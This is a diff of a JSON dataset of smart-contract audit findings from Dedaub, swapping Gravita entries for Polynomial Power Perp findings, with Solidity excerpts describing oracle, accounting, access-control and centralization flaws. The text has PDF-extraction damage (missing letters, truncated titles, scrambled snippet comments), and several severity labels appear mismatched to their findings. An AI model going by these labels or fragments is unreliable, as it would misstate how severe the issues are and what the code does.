+ "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "ER", "labels": [ "Dedaub", - "GYSR - Mar '23", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Medium" ] }, { - "title": "does not check if it is overwriting a previous queued oracle ", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": " RESOLVED (not applicable as of e4fbfc30) In PriceFeed::addOracle, the queuedOracles entry for the token is wrien without checking whether it is zero. This is only a problem in case the controller makes a mistake, but the presence of a deleteQueuedOracle function suggests that the right behavior for a controller would be to delete a queued oracle if its no longer valid. function addOracle(address _token, address _chainlinkOracle, bool _isEthIndexed) external override isController { AggregatorV3Interface newOracle = AggregatorV3Interface(_chainlinkOracle); _validateFeedResponse(newOracle); if (registeredOracles[_token].exists) { uint256 timelockRelease = block.timestamp.add(_getOracleUpdateTimelock()); queuedOracles[_token] = OracleRecord(newOracle, timelockRelease, true, true, _isEthIndexed); } else { registeredOracles[_token] = OracleRecord(newOracle, block.timestamp, true, emit NewOracleRegistered(_token, _chainlinkOracle, _isEthIndexed); true, _isEthIndexed); } } function deleteQueuedOracle(address _token) external override isController { delete queuedOracles[_token]; }", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "in LiquidityPool::withdraw OPEN Function LiquidityPool::withdraw uses a plain ERC20 transfer without checking the returned value, which is an unsafe practice. It is recommended to always either use OpenZeppelin's SafeERC20 library or at least to wrap each operation in a require statement.", "labels": [ "Dedaub", - "Gravita", - "Severity: Low" + "Polynomial Power Perp Contracts", + "Severity: Critical" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "timelock for adding oracles can be circumvented by deleting the previous oracle RESOLVED (not applicable as of e4fbfc30) On the same code as issue L1, in the PriceFeed contract, the controller can always subvert the above timelock by just deleting the registered oracle. function deleteOracle(address _token) external override isController { delete registeredOracles[_token]; } Thus, the timelock can only prevent accidents in the controller, and not provide assurances of having a delay for review of changes to oracles.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "withdrawal calculations in KangarooVault OPEN Function processWithdrawalQueue processes the KangarooVaults queued withdrawals. It rst checks if the available funds are suicient to cover the withdrawal. If not, a partial withdrawal is made and the records are updated to reflect that. The QueuedWithdraw.returnedAmount eld holds the value that has been returned to the 1 user thus far. However, it doesn't correctly account for partial withdrawals as the partial amount is being assigned to instead of being added to the variable. KangarooVault::processWithdrawalQueue() function processWithdrawalQueue( uint256 idCount ) external nonReentrant { for (uint256 i = 0; i < idCount; i++) { // Dedaub: Code omitted for brevity // Partial withdrawals if not enough available funds in the vault // Queue head is not increased if (susdToReturn > availableFunds) { // Dedaub: The withdrawn amounts should be accumulated in // current.returnedAmount = availableFunds; ... returnedAmount instead of being directly assigned } else { // Dedaub: Although this branch is for full withdrawals, there // // current.returnedAmount = susdToReturn; ... may have been partial withdrawals before, so the accounting should also be cumulative here } queuedWithdrawalHead++; } }", "labels": [ "Dedaub", - "Gravita", - "Severity: Low" + "Polynomial Power Perp Contracts", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "series of liquidations can cause the zeroing of totalStakes ACKNOWLEDGED The stake of a Vessel holding _asset as collateral is computed by the formula in VesselManager::_computeNewStake : stake = _coll.mul(totalStakesSnapshot[_asset]).div(totalCollateralSnapshot[_asset]); The stake is updated when the Vessel is adjusted and _coll is the new collateral amount of the Vessel and totalStakesSnapshot, totalCollateralSnapshot the total stakes and total collateral respectively right after the last liquidation. A liquidation followed by a redistribution of the debt and collateral to the other Vessels decreases the total stakes (the stake of the liquidated Vessel is just deleted and not shared among the others) and the total collateral (if we ignore the fees) does not change. Therefore the ratio in the above formula is constantly decreasing after each liquidation followed by redistribution and each new Vessel will get a relatively smaller stake. The nite precision of the arithmetic operations can lead to a zeroing of totalStakes, if a series of liquidations of Vessels with high stakes occurs. If this happens, the total stakes will be zero forever and each new vessel will be assigned a zero stake. If this happens many functionalities of the protocol are blocked i.e. the VesselManager::redistributeDebtAndCollateral will revert every time, since the debt and collateral to distribute are computed dividing by the (zero) totalStakes. The probability of such a problem is higher in Gravita, compared to Liquity, because Gravita allows multiple collateral assets, some of them, in principle, more volatile compared to ETH.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "exposure calculation may be inaccurate OPEN The Synthetix Perpetual Market has a two-step process for increasing/decreasing positions in which a request is submied and remains in a pending state until it is executed by a keeper. 1 LiquidityPool::_getExposure does not consider the queued Synthetix Perp position tracked by the queuedPerpSize storage variable meaning that LiquidityPool::getExposure will return an inaccurate value when called between the submission and the execution of an order. LiquidityPool::_getExposure() function _getExposure() internal view returns (int256 exposure) { // Dedaub: queuedPerpSize should be considered in currentPosition int256 currentPosition = _getTotalPerpPosition(); exposure = _calculateExposure(currentPosition); } LiquidityPool::rebalanceMargin does not consider queuedPerpSize too. The Polynomial team has mentioned that they plan to always call placeQueuedOrder before calling rebalanceMargin, thus adding a requirement that queuedPerpSize is equal to 0 would be enough to enforce that prerequisite. M8 LiquidityPool::_hedge always adds margin to OPEN Synthetix The function LiquidityPool::_hedge is responsible for hedging every position opened against the LiquidityPool by opening the opposite position in the Synthetix Perp Market. In doing so, _hedge transfers an amount of funds to the Synthetix Perp Market to be used as margin for the position. However, margin does not need to be increased always, e.g., it does not need to be increased when the Synthetix Perp position is decreased because the LiquidityPool is hedging a long Position and thus goes short. When the absolute position size of the LiquidityPool in the Synthetix Perp Market is decreased, the LiquidityPool could remove the unnecessary margin or abstain from increasing it to account for the rare case where a Synthetix order is not executed. This together with frequent calls to the rebalanceMargin function would help improve the capital eiciency of the LiquidityPool. 14 LOW SEVERITY: ", "labels": [ "Dedaub", - "Gravita", - "Severity: Low" + "Polynomial Power Perp Contracts", + "Severity: Medium" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "could return arbitrarily stale prices, if Chainlink Oracles response is not valid RESOLVED (e4fbfc30) The protocol uses the PriceFeed::fetchPrice to get the price of a _token, whenever it needs to. This function rst calls the Chainlink oracle to get the price for this _token and then checks the validity of the response. If it is valid, it stores the answer in lastGoodPrice[_token] and also returns it to the caller. If the Chainlink response is not valid, then the function returns the value stored in lastGoodPrice[_token]. The problem is that this value could have been stored a long time ago and there is no check about this in the contract. As an edge case, if the Chainlink oracle does not give a valid answer, upon its rst call for a _token, then the PriceFeed::fetchPrice function will return a zero price. Liquity uses a secondary oracle, if the response of Chainlink is not valid, and only if both oracles fail, the stored last good price is being used, but in Gravita there is no secondary oracle. L5 AdminContract::sanitizeParameters has no access control RESOLVED (58a41195) The function sets important collateral data (to default values) yet has no access control, unlike, e.g., the almost-equivalent setAsDefault, which is onlyOwner. 1 Although there are many other safeguards that ensure that collateral is valid, we recommend tightening the access control for sanitizeParameters as well. function sanitizeParameters(address _collateral) external { if (!collateralParams[_collateral].hasCollateralConfigured) { _setAsDefault(_collateral); } } function setAsDefault(address _collateral) external onlyOwner { _setAsDefault(_collateral); } CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) ", + "title": "that use invalid values could be avoide ", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": " OPEN Functions getIndexPrice, getFundingRate and getMarkPrice of the Exchange contract depend on the externally provided base asset price that could be invalid in some cases. Even if the base asset price provided is invalid, a tuple (value, true) is returned where value is the value computed based on the invalid base asset price. However, if the base asset price is invalid, the tuple (0, true) could be returned while the whole computation is skipped to save gas unnecessarily spent on computing an invalid value.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Low" ] }, { - "title": "contracts can mint arbitrarily large amounts of debt tokens ", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": " INFO (acknowledged) The role of the whitelisted contracts is not completely clear to us. There is only one related comment in DebtToken.sol : // stores SC addresses that are allowed to mint/burn the token (AMO strategies,", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "critical requirement is enforced by dependency code OPEN Function Exchange::_openTrade, when called with params.isLong set to false and params.positionId dierent from 0, does not check that the msg.sender is the owner of the params.positionId short token position. This necessary requirement is later checked when ShortToken::adjustPosition is called. Nevertheless, we would recommend adding the appropriate require statement also as part of the function _openTrade as it is the one querying the position. This would also add an extra safeguard against a future code change that accidentally removes the already existing require statement.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "mapping(address => bool) public whitelistedContracts; 1 These contracts can mint debt tokens without depositing any collateral calling DebtToken::mintFromWhitelistedContract. This could be a serious problem if such a contract was malicious. Also, even if these contracts work as expected, minting debt tokens without providing any collateral could have a serious impact on the price of the debt token. N2 Protocol owners can set crucial parameters INFO (acknowledged) Key functionality is trusted to the owner of various contracts. Owners can set the kinds of collateral accepted, the oracles that are used to price collateral, etc. Thus, protocol owners should be trusted by users. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "critical requirement is enforced by the ER", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Low" ] }, { - "title": "struct Vessel (IVesselManager.sol), asset is unnecessary ", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": " INFO Field asset of struct Vessel is currently unused. Vessel records are currently only used in a mapping that has the asset as the key, so there is no need to read the asset from the Vessel data. In FeeCollector::_decreaseDebt no need to check for", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "OPEN In function LiquidityPool::closeLong, as in openShort, there is an outgoing flow of funds. However, there does not exist a require statement on the existence of the needed funds as in the openShort function. Of course, if there are not enough funds to be transferred out of the LiquidityPool contract the ERC20 transfer code will cause a revert. Still, requiring that usedFunds<=0 || totalFunds>=uint256(usedFunds) 1 makes the code more failproof. The same could be applied on function rebalanceMargin where there is an outgoing flow of funds towards the Synthetix Perp Market.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Critical" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "fees if the expiration time of the refunding is block.timestamp INFO 1 In the code below if (mRecord.to < NOW) { } _closeExpiredOrLiquidatedFeeRecord(_borrower, _asset, mRecord.amount); < can be replaced by <=, since when mRecord == NOW, there is nothing left for the user to refund.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "critical requirement is enforced by callee code OPEN Function ShortCollateral::collectCollateral does not require that the provided collateral is approved (and matches the collateral of the already opened position). This could be problematic, i.e., a non-approved worthless collateral could be deposited instead, if every call to collectCollateral was not coupled with a call to getMinCollateral which enforces the aforementioned requirement. Implementing these requirements would constitute a step towards a more defensive approach, one that would make the system more bulletproof and robust even if the codebase continues to evolve and become more complicated.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "event INFO The following event is declared in IAdminContract.sol but not used anywhere: event MaxBorrowingFeeChanged(uint256 oldMaxBorrowingFee, uint256 newMaxBorrowingFee);", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "approvals cannot be revoked OPEN The ShortCollateral contract does not implement any functionality to revoke collateral approvals, meaning that the contract owner cannot undo even an incorrect approval and would need to redeploy the contract if that were to happen. Implementing such functionality would require a lot of care to ensure no funds (collateral) are trapped in the system, i.e., cannot be withdrawn, due to the collateral approval being revoked and the withdrawal functionality being operational only for approved collaterals.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "storage variables INFO The storage mapping StabilityPool::pendingCollGains and code accessing it are unnecessary since the information is never set to non-zero values. // Mapping from user address => pending collaterals to claim still // Must always be sorted by whitelist to keep leftSumColls functionality mapping(address => Colls) pendingCollGains; ... function getDepositorGains(address _depositor) public view returns (address[] memory, uint256[] memory) { // Add pending gains to the current gains return ( collateralsFromNewGains, _leftSumColls( Colls(collateralsFromNewGains, amountsFromNewGains), pendingCollGains[_depositor].tokens, pendingCollGains[_depositor].amounts ) ); } ... function _sendGainsToDepositor( 1 address _to, address[] memory assets, uint256[] memory amounts ) internal { ... // Reset pendingCollGains since those were all sent to the borrower Colls memory tempPendingCollGains; pendingCollGains[_to] = tempPendingCollGains; } Also, StabilityPool::controller is unused and never set: IAdminContract public controller; Finally, variables activePool, defaultPool in GravitaBase seem unused and not set (at least for most subcontracts of GravitaBase). IActivePool public activePool; IDefaultPool internal defaultPool;", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "events are emied for several interactions OPEN In LiquidityPool::processWithdrawals there is no event emied when a withdrawal is aempted but there are 0 funds available to be withdrawn. In LiquidityPool::setFeeReceipient there is no event emied even though a relevant event is declared in the contract (event UpdateFeeReceipient) 1 In LiquidityPool::executePerpOrders there is no event emied when the admin executes an order In KangarooVault::executePerpOrders there is no event emied when the admin executes an order In KangarooVault::receive there is no event emied when the contract receives ETH in contrast to the LiquidityPool that emits an event for this", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "is really just a transfer INFO In StabilityPool::_sendGainsToDepositor, it is not clear why the transferFrom is not merely a transfer. function _sendGainsToDepositor( address _to, address[] memory assets, uint256[] memory amounts ) internal { for (uint256 i = 0; i < assetsLen; ++i) { IERC20Upgradeable(asset).safeTransferFrom(address(this), _to, amount); } } 1", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "of minimum deposit and withdraw amount checks allow users to spam the queues with small requests OPEN In LiquidityPool, users can request to deposit or withdraw any amount of tokens by calling the queueDeposit and queueWithdraw functions. Although there are checks in place to avoid registering zero-amount requests, there are no checks to ensure that someone cannot spam the queue with requests for innitesimal amounts. LiquidityPool::queueDeposit() function queueDeposit(uint256 amount, address user) external override nonReentrant whenNotPaused(\"POOL_QUEUE_DEPOSIT\") { } require(amount > 0, \"Amount must be greater than 0\"); // Dedaub: Add a minDepositAmount check QueuedDeposit storage newDeposit = depositQueue[nextQueuedDepositId]; ... LiquidityPool::queueWithdraw() function queueWithdraw(uint256 tokens, address user) external 1 override nonReentrant whenNotPaused(\"POOL_QUEUE_WITHDRAW\") { } require(liquidityToken.balanceOf(msg.sender) >= tokens && tokens > 0); // Dedaub: Add a minWithdrawAmount check ... QueuedWithdraw storage newWithdraw = withdrawalQueue[nextQueuedWithdrawalId]; ... Even though there is no clear nancial incentive for someone to do this, an incentive would be to disrupt the normal flow of the protocol, and to annoy regular users, who would have to spend more gas until their requests were processed. However, the functions that process the queues can be called by anyone, including the admin, and users can also bypass the queues by directly depositing or withdrawing their tokens for a fee. KangarooVault suers from the same issue for withdrawals. For deposits, a minDepositAmount variable is dened and checked each time a new deposit call is made. KangarooVault::initiateDeposit() function initiateDeposit( address user, uint256 amount ) external nonReentrant { require(user != address(0x0)); require(amount >= minDepositAmount); ... } 1 KangarooVault::initiateWithdrawal() function initiateWithdrawal( address user, uint256 tokens ) external nonReentrant { require(user != address(0x0)); if (positionData.positionId == 0) { ... } else { require(tokens > 0, \"Tokens must be greater than 0\"); // Dedaub: Add a minWithdrawAmount check here QueuedWithdraw storage newWithdraw = withdrawalQueue[nextQueuedWithdrawalId]; ... } VAULT_TOKEN.burn(msg.sender, tokens); }", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "with more than 18 decimals are not supported INFO Tokens with more than 18 decimals are not supported, based on the SafetyTransfer library (outside the audit scope). function decimalsCorrection(address _token, uint256 _amount) internal view returns (uint256) if (_token == address(0)) return _amount; if (_amount == 0) return 0; uint8 decimals = ERC20Decimals(_token).decimals(); if (decimals < 18) { return _amount.div(10**(18 - decimals)); } return _amount; // Dedaub: more than 18 not supported correctly! { } We do not recommend trying to address this, as it may introduce other complexities for very lile practical benet. Instead, we recommend just being aware of the limitation.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "deposit and withdraw arguments are not OPEN validated LiquidityPools deposit and withdraw functions do not require that the specied user, which will receive the tokens, is dierent from address(0). The caller of the aforementioned functions might not set the parameter correctly or make the incorrect assumption that by seing it to address(0) it will default to msg.sender, leading to the tokens being sent to the wrong address. At the same time, the deposited/withdrawn amount is not required to be greater than 0.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "statement (consisting of a mere expression) INFO In BorrowingOperations::openVessel, the following expression (used as a statement!) is a no-op: vars.debtTokenFee;", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "can be front-run OPEN The VaultToken contract declares the setVault function to solve the dual dependency problem between VaultToken and KangarooVault, as both require each 1 other's address for their initialisation. However, this function can be called by anyone, whereas the vault address can only be set once. As a result, we raise a warning here to emphasize that the VaultToken contract needs to be correctly initialized, as otherwise the call could be front-run or repeated (in case the initialization performed by the protocol team fails for some reason and the uninitialized variable remains unnoticed) to initialize the vault storage variable with a malicious Vault address. L10 LiquidityPool::closeShort should use mulWadUp too OPEN The closeShort function of the LiquidityPool contract has the same logic as openLong. openLong passes the rounding error cost to the user by using mulWadUp for the tradeCost calculation. However, closeShort does not adopt this behavior and uses mulWadDown for the same calculation. We recommend changing this to be the same as openLong. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) ", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "external function, not called as expected INFO 1 BorrowerOperations::moveLiquidatedAssetToVessel appears to not be used in the protocol. // Send collateral to a vessel. Called by only the Stability Pool. function moveLiquidatedAssetToVessel( address _asset, uint256 _amountMoved, address _borrower, address _upperHint, address _lowerHint ) external override { _requireCallerIsStabilityPool(); _adjustVessel(_asset, _amountMoved, _borrower, 0, 0, false, _upperHint, _lowerHint); }", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": " OPE In LiquidityPool, the admin has increased power over its position leverage and the margin that is deposited to or withdrawn from the Synthetix Perp Market. More specically: First of all, the admin can arbitrarily set the leverage through the LiquidityPools updateLeverage function. Essentially, the risk of the LiquidityPool can be arbitrarily increased. LiquidityPool::updateLeverage() function updateLeverage(uint256 _leverage) external requiresAuth { require(_leverage >= 1e18); emit UpdateLeverage(futuresLeverage, _leverage); futuresLeverage = _leverage; } LiquidityPool::_calculateMargin() function _calculateMargin( int256 size ) internal view returns (uint256 margin) { (uint256 spotPrice, bool isInvalid) = baseAssetPrice(); require(!isInvalid && spotPrice > 0); uint256 absSize = size.abs(); margin = absSize.mulDivDown(spotPrice, futuresLeverage); } The admin is also responsible for managing the margin of the pools Synthetix Perp position. Via the LiquidityPool::increaseMargin function, the admin can use up to the whole available balance of the pool. The logic that decides when the aforementioned function is called is o-chain. LiquidityPool::increaseMargin() function increaseMargin( 2 uint256 additionalMargin ) external requiresAuth nonReentrant { perpMarket.transferMargin(int256(additionalMargin)); usedFunds += int256(additionalMargin); require(usedFunds <= 0 || totalFunds >= uint256(usedFunds)); emit IncreaseMargin(additionalMargin); } Additionally, the LiquidityPool::rebalanceMargin function can be used to increase or decrease the pools margin inside the limits set by the pools leverage and the margin limits set by Synthetix. Again the logic that decides the marginDelta parameter and calls rebalanceMargin is o-chain. The KangarooVault suers from similar centralization issues. Nevertheless, the function setLeverage of the KangarooVault does not allow the admin to set the leverage to more than 5x. N2 LiquidityPool admin can drain all deposited funds by being able to arbitrarily set the fee percentages OPEN In LiquidityPool, there are several functions that only the admin can control and allow him to parameterise all fee variables, such as deposit and withdrawal fees. However, there are no limits imposed on the values set for these variables. LiquidityPool::setFees() function setFees( uint256 _depositFee, uint256 _withdrawalFee ) external requiresAuth { ... // Dedaub: We recommend adding checks for depositFee and withdrawalFee // to prevent unrestricted fee rates 2 depositFee = _depositFee; withdrawalFee = _withdrawalFee; } This means that the admin could change the deposit/withdrawal fee and have all the newly deposited/withdrawn funds moved to the feeRecipient address. Apart from the obvious centralisation issue, such checks could prevent huge losses in the event of a compromise of the admin account or the protocol itself. On the other hand, such checks have been used in the KangarooVault and thus we strongly recommend adding them to LiquidityPool as well. KangarooVault::setFees() function setFees( uint256 _performanceFee, uint256 _withdrawalFee ) external requiresAuth { require(_performanceFee <= 1e17 && _withdrawalFee <= 1e16); ... performanceFee = _performanceFee; withdrawalFee = _withdrawalFee; } The same applies for the following functions that also need limits on the possible values that can be set by the admin: LiquidityPool::updateLeverage() (see also N1 for an example) LiquidityPool::updateStandardSize() LiquidityPool::setBaseTradingFee() LiquidityPool::setDevFee() LiquidityPool::setMaxSlippageFee() 2 OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "isInitialized flags INFO The following paern over storage variable isInitialized appears in several contracts but should be entirely unnecessary, due to the presence of the initializer modier. bool public isInitialized; function setAddresses(...) external initializer { require(!isInitialized); isInitialized = true; } Contracts with the paern include FeeCollector, PriceFeed, ActivePool, CollSurplusPool, DefaultPool, SortedVessels, StabilityPool, VesselManager, VesselManagerOperations, CommunityIssuance, GRVTStaking.", + "title": "requirements can be added ", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": " INFO Functions _addCollateral and _removeCollateral of the Exchange contract do not require that amount > 0. Function _liquidate does not require that debtRepaying > 0.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "INFO 1 The codebase exhibits some old code paerns (which we do not recommend xing, since they directly mimick the Liquity trusted code): The use of assert for condition checking (instead of require/ifrevert). (Some of the asserts have been replaced, but not all.) The use of SafeMath instead of relying on Solidity 0.8.* checks.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "does not check if the collateral is already approved INFO Function ShortCollateral::approveCollateral does not require that collateral.isApproved == false to disallow approving the same collateral more than once.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "and error-prone use of this.* INFO Some same-contract function calls are made with the paern this.func(), which causes a new internal transaction and changes the msg.sender. This should be avoided for clarity and (gas) performance. In VesselManager: function isVesselActive(address _asset, address _borrower) public view override returns (bool) { return this.getVesselStatus(_asset, _borrower) == uint256(Status.active); } In PriceFeed (and also note the unusual convention of 0 = ETH): function _calcEthPrice(uint256 ethAmount) internal returns (uint256) { uint256 ethPrice = this.fetchPrice(address(0)); // Dedaub: Also, why the convention that 0 = ETH? return ethPrice.mul(ethAmount).div(1 ether); } function _fetchNativeWstETHPrice() internal returns (uint256 price) { uint256 wstEthToStEthValue = _getWstETH_StETHValue(); OracleRecord storage stEth_UsdOracle = registeredOracles[stethToken]; price = stEth_UsdOracle.exists ? this.fetchPrice(stethToken) : _calcEthPrice(wstEthToStEthValue); _storePrice(wstethToken, price); } 1 Compatibility of PriceFeed::_fetchPrevFeedResponse,", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "can return early in some cases INFO In LiquidityPool::hedgePositions there is no handling of the case where newPosition is equal to 0 and the execution can return early.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "with future versions of the Chainlink INFO Aggregator The roundId returned by the Chainlink AggregatorProxy contract is a uint80.The 16 most important bits keep the phaseId (incremented every time the underlying aggregator is updated) and the other 64 bits keep the roundId of the aggregator. As long as the underlying aggregator is the same, the roundId returned by the proxy will increase by one in each new round, but in an update of the aggregator contract the proxy roundId will increment not by 1, since the phaseId will also change. In this case the previous round is not current_roundId-1 and _fetchPrevFeedResponse will not return the price data from the previous round (which was a round of the previous aggregator). We mention this issue, although the probability that the protocol fetches a price at the time of an update of a Chainlink oracle is relatively small and each round lasts a few minutes to an hour. PriceFeed::_isValidResponse does all the validity checks necessary for the current Chainlink Aggregator version. Chaninlinks AggregatorProxy::latestRoundData returns also two extra values uint256 startedAt, uint80 answeredInRound, which, for the current version, do not hold extra information i.e. answeredInRound==roundId, but in past and possible future versions they could be used for some extra validity checks i.e. answeredInRound>=roundId.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "pause logic used in KangarooVault INFO Core contracts of the protocol such as LiquidityPool and Exchange inherit the PauseModifier and use separate pause logic on several functions. In contrast, KangarooVault, which has an implemented logic similar to LiquidityPool, inherits the PauseModifier but it does not use the whenNotPaused modier on any function.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "code In BorrowerOperations: function _requireNonZeroAdjustment( uint256 _collWithdrawal, uint256 _debtTokenChange, uint256 _assetSent ) internal view { require( INFO msg.value != 0 || _collWithdrawal != 0 || _debtTokenChange != 0 || 1 _assetSent != 0, \"BorrowerOps: There must be either a collateral change or a debt // Dedaub: `msg.value != 0` not possible change\" ); } the condition msg.value != 0 is not possible, as ensured in the single place where this function is called (_adjustVessel). The condition should be kept if the function is to be usable elsewhere in the future. Similarly, in VesselManager, the condition marked with a comment below seems unnecessary, given that the arithmetic is compiler-checked. function decreaseVesselDebt( address _asset, address _borrower, uint256 _debtDecrease ) external override onlyBorrowerOperations returns (uint256) { uint256 oldDebt = Vessels[_borrower][_asset].debt; if (_debtDecrease == 0) { return oldDebt; // no changes } uint256 paybackFraction = (_debtDecrease * 1 ether) / oldDebt; uint256 newDebt = oldDebt - _debtDecrease; Vessels[_borrower][_asset].debt = newDebt; if (paybackFraction > 0) { if (paybackFraction > 1 ether) { // Dedaub:Impossible. The \"-\" would have reverted, three lines above paybackFraction = 1 ether; } feeCollector.decreaseDebt(_borrower, _asset, paybackFraction); } return newDebt; } 1", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "logic can be optimized to save gas INFO 2 In the functions LiquidityPool::processWithdraws and KangarooVault::processWithdrawalQueue, the LP token price is calculated in every iteration of the loop that processes withdrawals when in fact it does not change. Thus, the computation could be performed once, before the loop, to save gas.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "ownable policy INFO Some contracts are dened to be Ownable (using the OZ libraries), yet do not use this capability (beyond initialization). These 